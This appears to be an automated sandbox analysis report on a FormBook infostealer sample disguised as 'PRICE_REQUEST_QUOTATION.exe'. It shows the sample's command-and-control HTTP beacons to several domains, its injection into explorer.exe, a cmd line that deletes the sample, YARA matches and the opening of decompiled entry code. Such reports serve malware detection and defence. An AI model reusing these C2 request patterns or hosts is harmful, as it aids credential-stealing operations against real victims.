Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.patrickandmaxine.com

www.teelandcompany.com

www.nailsestetic.space

www.futurodr.com

www.babeshotnud.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49775	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:04.103997946 CEST	5759	OUT	GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.patrickandmaxine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:04.181961060 CEST	5760	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 28 Sep 2021 06:05:04 GMT Content-Length: 0 Connection: close location: https://www.patrickandmaxine.com/rgoe?3fph-P=SDpSJcP09%2FDC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc strict-transport-security: max-age=120 x-wix-request-id: 1632809104.12353479359118688 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi5yDv3kmVKOr5HAuRayZgu,qquldgcFrj2n046g4RNSVGDCtDC/zjI7y/qL/ByVDnpYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalmNz/RuQP3rtdZ/RMDvoHeVyBqs9bMu3gZEQ/tjE7tv/3fKEXQvQlSAkB/lstal9R3MFzREVKyPFapXmT9a+sC4=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBbk0oko9S7vJ2Ws8rbzPIcRNG+KuK+VIZfbNzHJu0vJu,UvY1uiXtmgas6aI2l+unv5E44X1eKbavIjeRM6T+g8dJRdfVwrOGfuCHlvTHdkToWIHlCalF7YnfvOr2cMPpyw== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49777	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:19.317270994 CEST	5770	OUT	GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.teelandcompany.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:19.560904026 CEST	5771	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 28 Sep 2021 06:05:19 GMT Content-Type: text/html Content-Length: 275 ETag: "61525017-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49781	109.106.246.165	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:24.666732073 CEST	5784	OUT	GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.nailsestetic.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:24.814122915 CEST	5785	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 28 Sep 2021 06:05:24 GMT Content-Length: 13724 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}
Sep 28, 2021 08:05:24.814173937 CEST	5787	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a 20 38 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 20 31 30 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 Data Ascii: .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;} .sk-circle .sk-child:before {content: '';displa
Sep 28, 2021 08:05:24.814193964 CEST	5788	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 39 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a Data Ascii: ransform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform: rotate(240deg); } .sk-circle .sk-circle10 {-webkit-transform: rotate(270deg);-ms-transform:
Sep 28, 2021 08:05:24.814209938 CEST	5789	IN	Data Raw: 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 31 30 3a 62 65 66 6f 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 73 3b 61 6e Data Ascii: s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animation-delay: -0.3s; } .sk-circle .sk-circle11:before {-webkit-animation-delay: -0.2s;animation-delay: -0.2s; } .sk-circle .sk-circle12:
Sep 28, 2021 08:05:24.814225912 CEST	5791	IN	Data Raw: 2a 20 39 29 20 2b 20 31 29 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 72 2e 70 75 73 68 28 61 72 72 5b 30 5d 20 2a 20 61 72 72 5b 31 5d 20 2a 20 61 72 72 5b 32 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 20 Data Ascii: * 9) + 1)]; arr.push(arr[0] * arr[1] * arr[2]); d = new Date().getTime(); arr = []; b = navigator.appName; div1 = document.createElement('div'); di
Sep 28, 2021 08:05:24.814241886 CEST	5792	IN	Data Raw: 6c 65 2e 6c 65 6e 67 74 68 29 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: le.length)); return text; } (function () { var a = function () { try { return !!window.addEventListener } cat
Sep 28, 2021 08:05:24.814258099 CEST	5793	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 69 72 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <div class="sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-cir
Sep 28, 2021 08:05:24.814275026 CEST	5795	IN	Data Raw: 73 68 22 20 76 61 6c 75 65 3d 22 66 65 33 34 64 66 35 36 30 34 35 62 30 61 36 36 32 34 34 35 37 66 66 33 31 65 31 66 62 61 33 33 31 39 61 65 37 33 31 34 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: sh" value="fe34df56045b0a6624457ff31e1fba3319ae7314"/> <input type="hidden" name="origin_url" value="/rgoe/"/> </form> </div> <div class="link">
Sep 28, 2021 08:05:24.814291000 CEST	5796	IN	Data Raw: 71 63 6f 6e 74 61 63 74 73 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 6a 65 76 65 6e 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 Data Ascii: qcontacts/ </a><br><a href='index.php?option=com_jevents'>This contact form is about /components/com_jevents/ </a><br><a href='index.php?option=com_contact'>This contact form is about /components/com_contact/ </a><br><a href='index.php?opti
Sep 28, 2021 08:05:24.814312935 CEST	5797	IN	Data Raw: 2e 70 68 70 3f 70 61 72 61 6d 3d 68 6f 6e 65 79 22 3e 47 48 44 42 20 53 69 67 6e 61 74 75 72 65 20 23 37 33 33 20 28 26 71 75 6f 74 3b 45 6e 74 65 72 20 69 70 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 26 71 75 6f 74 3b 70 68 70 2d 70 69 6e 67 2e 70 Data Ascii: .php?param=honey">GHDB Signature #733 ("Enter ip" inurl:"php-ping.php")</a><br><br><a href="demo/GHH%20-%20PHP%20Shell/phpshell.php?param=honey">GHDB Signature #365 (intitle:"PHP Shell *" "Enable stderr&quo
Sep 28, 2021 08:05:24.814328909 CEST	5798	IN	Data Raw: 75 64 64 79 6c 69 73 74 22 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 31 2e 31 20 2d 20 46 69 6c 65 20 55 70 6c 6f 61 64 20 4d 61 6e 61 67 65 72 2f 22 3e 47 48 44 42 20 53 69 67 6e Data Ascii: uddylist")</a> <br><br><a href="/demo/?GHH v1.1 - File Upload Manager/">GHDB Signature #734 ("File Upload Manager v1.3" "rename to")</a> <br><br><a href="/demo/?GHH v1.1 - passlist.txt/passlist.txt">GHDB Signature #58 (inurl:passlist.txt)</a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49782	154.208.173.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:30.271586895 CEST	5799	OUT	GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.futurodr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49783	185.107.56.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:35.629242897 CEST	5800	OUT	GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.babeshotnud.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:36.039222956 CEST	5800	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Tue, 28 Sep 2021 06:05:35 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=18c140ce-2022-11ec-a1ad-e2db040519d9; path=/; domain=.babeshotnud.com; expires=Sun, 16 Oct 2089 09:19:43 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 3952 Parent PID: 5664

General

Start time:	08:03:33
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x400000
File size:	267109 bytes
MD5 hash:	85589170AF713A03CA622F94429C634A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 4684 Parent PID: 3952

General

Start time:	08:03:35
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x400000
File size:	267109 bytes
MD5 hash:	85589170AF713A03CA622F94429C634A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 4684

General

Start time:	08:03:43
Start date:	28/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autoconv.exe PID: 4484 Parent PID: 3472

General

Start time:	08:04:11
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xd10000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: wscript.exe PID: 4960 Parent PID: 3472

General

Start time:	08:04:11
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x1060000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4860 Parent PID: 4960

General

Start time:	08:04:14
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 496 Parent PID: 4860

General

Start time:	08:04:15
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 3952 Parent PID: 5664 PRICE_REQUEST_QUOTATION.exeCOMMON

Executed Functions

Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315
stringfilecomCOMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
